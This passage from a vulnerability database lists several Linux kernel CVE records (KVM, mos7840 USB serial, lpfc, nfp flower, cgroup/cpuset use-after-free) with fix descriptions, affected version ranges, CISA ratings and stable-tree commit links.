0000000000000086\n R10: 00000000000000eb R11: 00007fefbdf2baa0 R12: 0000000000000000\n R13: 0000000000000002 R14: 000000000007d000 R15: 0000000000001000"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:26:37.550Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/72fdfc75d4217b32363cc80def3de2cb3fef3f02"
},
{
"url": "https://git.kernel.org/stable/c/4c3644b6c96c5daa5149e5abddc07234eea47c7c"
},
{
"url": "https://git.kernel.org/stable/c/62040f5cd7d937de547836e747b6aa8212fec573"
},
{
"url": "https://git.kernel.org/stable/c/6f3c1fc53d86d580d8d6d749c4af23705e4f6f79"
}
],
"title": "KVM: x86/mmu: make apf token non-zero to fix bug",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48943",
"datePublished": "2024-08-22T03:30:14.027Z",
"dateReserved": "2024-08-22T01:27:53.623Z",
"dateUpdated": "2025-05-04T08:26:37.550Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42244 (GCVE-0-2024-42244)
Vulnerability from cvelistv5
Published
2024-08-07 15:14
Modified
2025-05-04 09:24
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
USB: serial: mos7840: fix crash on resume
Since commit c49cfa917025 ("USB: serial: use generic method if no
alternative is provided in usb serial layer"), USB serial core calls the
generic resume implementation when the driver has not provided one.
This can trigger a crash on resume with mos7840 since support for
multiple read URBs was added back in 2011. Specifically, both port read
URBs are now submitted on resume for open ports, but the context pointer
of the second URB is left set to the core rather than mos7840 port
structure.
Fix this by implementing dedicated suspend and resume functions for
mos7840.
Tested with Delock 87414 USB 2.0 to 4x serial adapter.
[ johan: analyse crash and rewrite commit message; set busy flag on
resume; drop bulk-in check; drop unnecessary usb_kill_urb() ]
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d83b405383c965498923f3561c3321e2b5df5727 Version: d83b405383c965498923f3561c3321e2b5df5727 Version: d83b405383c965498923f3561c3321e2b5df5727 Version: d83b405383c965498923f3561c3321e2b5df5727 Version: d83b405383c965498923f3561c3321e2b5df5727 Version: d83b405383c965498923f3561c3321e2b5df5727 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42244",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:13:38.256870Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:31.353Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/serial/mos7840.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "932a86a711c722b45ed47ba2103adca34d225b33",
"status": "affected",
"version": "d83b405383c965498923f3561c3321e2b5df5727",
"versionType": "git"
},
{
"lessThan": "b14aa5673e0a8077ff4b74f0bb260735e7d5e6a4",
"status": "affected",
"version": "d83b405383c965498923f3561c3321e2b5df5727",
"versionType": "git"
},
{
"lessThan": "1094ed500987e67a9d18b0f95e1812f1cc720856",
"status": "affected",
"version": "d83b405383c965498923f3561c3321e2b5df5727",
"versionType": "git"
},
{
"lessThan": "5ae6a64f18211851c8df6b4221381c438b9a7348",
"status": "affected",
"version": "d83b405383c965498923f3561c3321e2b5df5727",
"versionType": "git"
},
{
"lessThan": "553e67dec846323b5575e78a776cf594c13f98c4",
"status": "affected",
"version": "d83b405383c965498923f3561c3321e2b5df5727",
"versionType": "git"
},
{
"lessThan": "c15a688e49987385baa8804bf65d570e362f8576",
"status": "affected",
"version": "d83b405383c965498923f3561c3321e2b5df5727",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/serial/mos7840.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.3"
},
{
"lessThan": "3.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.222",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.163",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.100",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.41",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.222",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.163",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.100",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.41",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.10",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "3.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nUSB: serial: mos7840: fix crash on resume\n\nSince commit c49cfa917025 (\"USB: serial: use generic method if no\nalternative is provided in usb serial layer\"), USB serial core calls the\ngeneric resume implementation when the driver has not provided one.\n\nThis can trigger a crash on resume with mos7840 since support for\nmultiple read URBs was added back in 2011. Specifically, both port read\nURBs are now submitted on resume for open ports, but the context pointer\nof the second URB is left set to the core rather than mos7840 port\nstructure.\n\nFix this by implementing dedicated suspend and resume functions for\nmos7840.\n\nTested with Delock 87414 USB 2.0 to 4x serial adapter.\n\n[ johan: analyse crash and rewrite commit message; set busy flag on\n resume; drop bulk-in check; drop unnecessary usb_kill_urb() ]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:24:57.378Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/932a86a711c722b45ed47ba2103adca34d225b33"
},
{
"url": "https://git.kernel.org/stable/c/b14aa5673e0a8077ff4b74f0bb260735e7d5e6a4"
},
{
"url": "https://git.kernel.org/stable/c/1094ed500987e67a9d18b0f95e1812f1cc720856"
},
{
"url": "https://git.kernel.org/stable/c/5ae6a64f18211851c8df6b4221381c438b9a7348"
},
{
"url": "https://git.kernel.org/stable/c/553e67dec846323b5575e78a776cf594c13f98c4"
},
{
"url": "https://git.kernel.org/stable/c/c15a688e49987385baa8804bf65d570e362f8576"
}
],
"title": "USB: serial: mos7840: fix crash on resume",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42244",
"datePublished": "2024-08-07T15:14:30.359Z",
"dateReserved": "2024-07-30T07:40:12.254Z",
"dateUpdated": "2025-05-04T09:24:57.378Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43821 (GCVE-0-2024-43821)
Vulnerability from cvelistv5
Published
2024-08-17 09:21
Modified
2025-05-04 09:27
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: lpfc: Fix a possible null pointer dereference
In function lpfc_xcvr_data_show, the memory allocation with kmalloc might
fail, thereby making rdp_context a null pointer. In the following context
and functions that use this pointer, there are dereferencing operations,
leading to null pointer dereference.
To fix this issue, a null pointer check should be added. If it is null,
use scnprintf to notify the user and return len.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43821",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:09:00.684466Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:24.948Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/scsi/lpfc/lpfc_attr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "57600a7dd2b52c904f7c8d2cac0fd8c23868e680",
"status": "affected",
"version": "479b0917e4477f49df2e3be454aac3cfa5dec171",
"versionType": "git"
},
{
"lessThan": "45b2a23e00d448a9e6d1f371ca3a4d4b073fe78c",
"status": "affected",
"version": "479b0917e4477f49df2e3be454aac3cfa5dec171",
"versionType": "git"
},
{
"lessThan": "5e0bf3e8aec2cbc51123f84b29aaacbd91fc56fa",
"status": "affected",
"version": "479b0917e4477f49df2e3be454aac3cfa5dec171",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/scsi/lpfc/lpfc_attr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.2"
},
{
"lessThan": "6.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "6.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: lpfc: Fix a possible null pointer dereference\n\nIn function lpfc_xcvr_data_show, the memory allocation with kmalloc might\nfail, thereby making rdp_context a null pointer. In the following context\nand functions that use this pointer, there are dereferencing operations,\nleading to null pointer dereference.\n\nTo fix this issue, a null pointer check should be added. If it is null,\nuse scnprintf to notify the user and return len."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:27:00.908Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/57600a7dd2b52c904f7c8d2cac0fd8c23868e680"
},
{
"url": "https://git.kernel.org/stable/c/45b2a23e00d448a9e6d1f371ca3a4d4b073fe78c"
},
{
"url": "https://git.kernel.org/stable/c/5e0bf3e8aec2cbc51123f84b29aaacbd91fc56fa"
}
],
"title": "scsi: lpfc: Fix a possible null pointer dereference",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43821",
"datePublished": "2024-08-17T09:21:42.343Z",
"dateReserved": "2024-08-17T09:11:59.271Z",
"dateUpdated": "2025-05-04T09:27:00.908Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48934 (GCVE-0-2022-48934)
Vulnerability from cvelistv5
Published
2024-08-22 03:31
Modified
2025-05-04 08:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nfp: flower: Fix a potential leak in nfp_tunnel_add_shared_mac()
ida_simple_get() returns an id between min (0) and max (NFP_MAX_MAC_INDEX)
inclusive.
So NFP_MAX_MAC_INDEX (0xff) is a valid id.
In order for the error handling path to work correctly, the 'invalid'
value for 'ida_idx' should not be in the 0..NFP_MAX_MAC_INDEX range,
inclusive.
So set it to -1.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48934",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:32:40.321357Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:59.630Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/netronome/nfp/flower/tunnel_conf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5ad5886f85b6bd893e3ed19013765fb0c243c069",
"status": "affected",
"version": "20cce88650981ec504d328dbbdd004d991eb8535",
"versionType": "git"
},
{
"lessThan": "af4bc921d39dffdb83076e0a7eed1321242b7d87",
"status": "affected",
"version": "20cce88650981ec504d328dbbdd004d991eb8535",
"versionType": "git"
},
{
"lessThan": "9d8097caa73200710d52b9f4d9f430548f46a900",
"status": "affected",
"version": "20cce88650981ec504d328dbbdd004d991eb8535",
"versionType": "git"
},
{
"lessThan": "4086d2433576baf85f0e538511df97c8101e0a10",
"status": "affected",
"version": "20cce88650981ec504d328dbbdd004d991eb8535",
"versionType": "git"
},
{
"lessThan": "3a14d0888eb4b0045884126acc69abfb7b87814d",
"status": "affected",
"version": "20cce88650981ec504d328dbbdd004d991eb8535",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/netronome/nfp/flower/tunnel_conf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.182",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.182",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.103",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.26",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.12",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfp: flower: Fix a potential leak in nfp_tunnel_add_shared_mac()\n\nida_simple_get() returns an id between min (0) and max (NFP_MAX_MAC_INDEX)\ninclusive.\nSo NFP_MAX_MAC_INDEX (0xff) is a valid id.\n\nIn order for the error handling path to work correctly, the \u0027invalid\u0027\nvalue for \u0027ida_idx\u0027 should not be in the 0..NFP_MAX_MAC_INDEX range,\ninclusive.\n\nSo set it to -1."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:26:23.470Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5ad5886f85b6bd893e3ed19013765fb0c243c069"
},
{
"url": "https://git.kernel.org/stable/c/af4bc921d39dffdb83076e0a7eed1321242b7d87"
},
{
"url": "https://git.kernel.org/stable/c/9d8097caa73200710d52b9f4d9f430548f46a900"
},
{
"url": "https://git.kernel.org/stable/c/4086d2433576baf85f0e538511df97c8101e0a10"
},
{
"url": "https://git.kernel.org/stable/c/3a14d0888eb4b0045884126acc69abfb7b87814d"
}
],
"title": "nfp: flower: Fix a potential leak in nfp_tunnel_add_shared_mac()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48934",
"datePublished": "2024-08-22T03:31:28.388Z",
"dateReserved": "2024-08-21T06:06:23.299Z",
"dateUpdated": "2025-05-04T08:26:23.470Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43853 (GCVE-0-2024-43853)
Vulnerability from cvelistv5
Published
2024-08-17 09:22
Modified
2025-05-04 09:27
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
cgroup/cpuset: Prevent UAF in proc_cpuset_show()
An UAF can happen when /proc/cpuset is read as reported in [1].
This can be reproduced by the following methods:
1.add an mdelay(1000) before acquiring the cgroup_lock In the
cgroup_path_ns function.
2.$cat /proc/<pid>/cpuset repeatly.
3.$mount -t cgroup -o cpuset cpuset /sys/fs/cgroup/cpuset/
$umount /sys/fs/cgroup/cpuset/ repeatly.
The race that cause this bug can be shown as below:
(umount) | (cat /proc/<pid>/cpuset)
css_release | proc_cpuset_show
css_release_work_fn | css = task_get_css(tsk, cpuset_cgrp_id);
css_free_rwork_fn | cgroup_path_ns(css->cgroup, ...);
cgroup_destroy_root | mutex_lock(&cgroup_mutex);
rebind_subsystems |
cgroup_free_root |
| // cgrp was freed, UAF
| cgroup_path_ns_locked(cgrp,..);
When the cpuset is initialized, the root node top_cpuset.css.cgrp
will point to &cgrp_dfl_root.cgrp. In cgroup v1, the mount operation will
allocate cgroup_root, and top_cpuset.css.cgrp will point to the allocated
&cgroup_root.cgrp. When the umount operation is executed,
top_cpuset.css.cgrp will be rebound to &cgrp_dfl_root.cgrp.
The problem is that when rebinding to cgrp_dfl_root, there are cases
where the cgroup_root allocated by setting up the root for cgroup v1
is cached. This could lead to a Use-After-Free (UAF) if it is
subsequently freed. The descendant cgroups of cgroup v1 can only be
freed after the css is released. However, the css of the root will never
be released, yet the cgroup_root should be freed when it is unmounted.
This means that obtaining a reference to the css of the root does
not guarantee that css.cgrp->root will not be freed.
Fix this problem by using rcu_read_lock in proc_cpuset_show().
As cgroup_root is kfree_rcu after commit d23b5c577715
("cgroup: Make operations on the cgroup root_list RCU safe"),
css->cgroup won't be freed during the critical section.
To call cgroup_path_ns_locked, css_set_lock is needed, so it is safe to
replace task_get_css with task_css.
[1] https://syzkaller.appspot.com/bug?extid=9b1ff7be974a403aa4cd
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: a79a908fd2b080977b45bf103184b81c9d11ad07 Version: a79a908fd2b080977b45bf103184b81c9d11ad07 Version: a79a908fd2b080977b45bf103184b81c9d11ad07 Version: a79a908fd2b080977b45bf103184b81c9d11ad07 Version: a79a908fd2b080977b45bf103184b81c9d11ad07 Version: a79a908fd2b080977b45bf103184b81c9d11ad07 Version: a79a908fd2b080977b45bf103184b81c9d11ad07 Version: a79a908fd2b080977b45bf103184b81c9d11ad07 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43853",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:07:17.671649Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:20.917Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/cgroup/cpuset.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "27d6dbdc6485d68075a0ebf8544d6425c1ed84bb",
"status": "affected",
"version": "a79a908fd2b080977b45bf103184b81c9d11ad07",
"versionType": "git"
},
{
"lessThan": "10aeaa47e4aa2432f29b3e5376df96d7dac5537a",
"status": "affected",
"version": "a79a908fd2b080977b45bf103184b81c9d11ad07",
"versionType": "git"
},
{
"lessThan": "688325078a8b5badd6e07ae22b27cd04e9947aec",
"status": "affected",
"version": "a79a908fd2b080977b45bf103184b81c9d11ad07",
"versionType": "git"
},
{
"lessThan": "4e8d6ac8fc9f843e940ab7389db8136634e07989",
"status": "affected",
"version": "a79a908fd2b080977b45bf103184b81c9d11ad07",
"versionType": "git"
},
{
"lessThan": "29a8d4e02fd4840028c38ceb1536cc8f82a257d4",
"status": "affected",
"version": "a79a908fd2b080977b45bf103184b81c9d11ad07",
"versionType": "git"
},
{
"lessThan": "96226fbed566f3f686f53a489a29846f2d538080",
"status": "affected",
"version": "a79a908fd2b080977b45bf103184b81c9d11ad07",
"versionType": "git"
},
{
"lessThan": "29ac1d238b3bf126af36037df80d7ecc4822341e",
"status": "affected",
"version": "a79a908fd2b080977b45bf103184b81c9d11ad07",
"versionType": "git"
},
{
"lessThan": "1be59c97c83ccd67a519d8a49486b3a8a73ca28a",
"status": "affected",
"version": "a79a908fd2b080977b45bf103184b81c9d11ad07",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/cgroup/cpuset.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.6"
},
{
"lessThan": "4.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.321",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.283",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.225",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.166",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.321",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.283",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.225",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.166",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncgroup/cpuset: Prevent UAF in proc_cpuset_show()\n\nAn UAF can happen when /proc/cpuset is read as reported in [1].\n\nThis can be reproduced by the following methods:\n1.add an mdelay(1000) before acquiring the cgroup_lock In the\n cgroup_path_ns function.\n2.$cat /proc/\u003cpid\u003e/cpuset repeatly.\n3.$mount -t cgroup -o cpuset cpuset /sys/fs/cgroup/cpuset/\n$umount /sys/fs/cgroup/cpuset/ repeatly.\n\nThe race that cause this bug can be shown as below:\n\n(umount)\t\t|\t(cat /proc/\u003cpid\u003e/cpuset)\ncss_release\t\t|\tproc_cpuset_show\ncss_release_work_fn\t|\tcss = task_get_css(tsk, cpuset_cgrp_id);\ncss_free_rwork_fn\t|\tcgroup_path_ns(css-\u003ecgroup, ...);\ncgroup_destroy_root\t|\tmutex_lock(\u0026cgroup_mutex);\nrebind_subsystems\t|\ncgroup_free_root \t|\n\t\t\t|\t// cgrp was freed, UAF\n\t\t\t|\tcgroup_path_ns_locked(cgrp,..);\n\nWhen the cpuset is initialized, the root node top_cpuset.css.cgrp\nwill point to \u0026cgrp_dfl_root.cgrp. In cgroup v1, the mount operation will\nallocate cgroup_root, and top_cpuset.css.cgrp will point to the allocated\n\u0026cgroup_root.cgrp. When the umount operation is executed,\ntop_cpuset.css.cgrp will be rebound to \u0026cgrp_dfl_root.cgrp.\n\nThe problem is that when rebinding to cgrp_dfl_root, there are cases\nwhere the cgroup_root allocated by setting up the root for cgroup v1\nis cached. This could lead to a Use-After-Free (UAF) if it is\nsubsequently freed. The descendant cgroups of cgroup v1 can only be\nfreed after the css is released. However, the css of the root will never\nbe released, yet the cgroup_root should be freed when it is unmounted.\nThis means that obtaining a reference to the css of the root does\nnot guarantee that css.cgrp-\u003eroot will not be freed.\n\nFix this problem by using rcu_read_lock in proc_cpuset_show().\nAs cgroup_root is kfree_rcu after commit d23b5c577715\n(\"cgroup: Make operations on the cgroup root_list RCU safe\"),\ncss-\u003ecgroup won\u0027t be freed during the critical section.\nTo call cgroup_path_ns_locked, css_set_lock is needed, so it is safe to\nreplace task_get_css with task_css.\n\n[1] https://syzkaller.appspot.com/bug?extid=9b1ff7be974a403aa4cd"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:27:44.286Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
